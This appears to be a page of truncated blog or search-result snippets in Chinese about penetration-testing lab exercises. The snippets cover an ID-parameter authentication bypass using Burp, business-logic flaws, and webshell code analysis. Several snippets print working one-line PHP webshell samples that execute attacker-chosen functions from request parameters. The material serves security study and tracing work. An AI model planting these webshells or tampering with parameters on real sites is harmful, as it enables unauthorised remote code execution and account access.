一、身份認證失效漏洞實戰 1.在墨者學院開啟靶場，查看靶場目標。 2.訪問靶場。 3.打開burp抓包，用靶場提供的賬號登錄。 4.查看burp，可以發現一個帶有card_id的GET包。重放返回test賬號的信息。（card_id值為20128880322） 5.修改 ...

業務邏輯漏洞 基礎知識補充： User-Agent User Agent中文名為用戶代理，簡稱 UA，它是一個特殊字符串頭，使得服務器能夠識別客戶使用的操作系統及版本、CPU 類型、瀏覽器及版本 ...

、前端知識。 2、啟動靶場環境，看到一個登錄頁面，已給出測試賬戶test/test，嘗試登錄抓包。 ...

WebShell代碼分析溯源(一) 一、一句話變形馬樣本 <?php $_GET['POST']($_POST['GET']);?> 二、代碼分析 1、調整代碼格式 <?php $_GET['POST']($_POST['GET']); ?> 2、分析 ...

WebShell代碼分析溯源(四) 一、一句話變形馬樣本 <?php ...

背景知識 substr函數介紹 string substring(string, start, length) string substr(string, start, length) 第一個 ...

前言 大家好，我是一個滲透測試的愛好者和初學者，從事網絡安全相關工作，由於愛好網上和朋友處找了好多關於滲透的視頻、工具等資料，然后自己找了一個靶場，想把自己練習的體會和過程分享出來，希望能對其他滲透愛好者、初學者能有一些幫助。本人發布的內容為技術交流，不為其他用途。本人也是一個小白，還請技術大佬 ...

WebShell代碼分析溯源(十一) 一、一句話變形馬樣本 <?php $e = $_REQUEST['e'];declare(ticks=1);register_tick_function ($e, $_REQUEST['GET']);?> 二、代碼分析 1、調整代碼格式 ...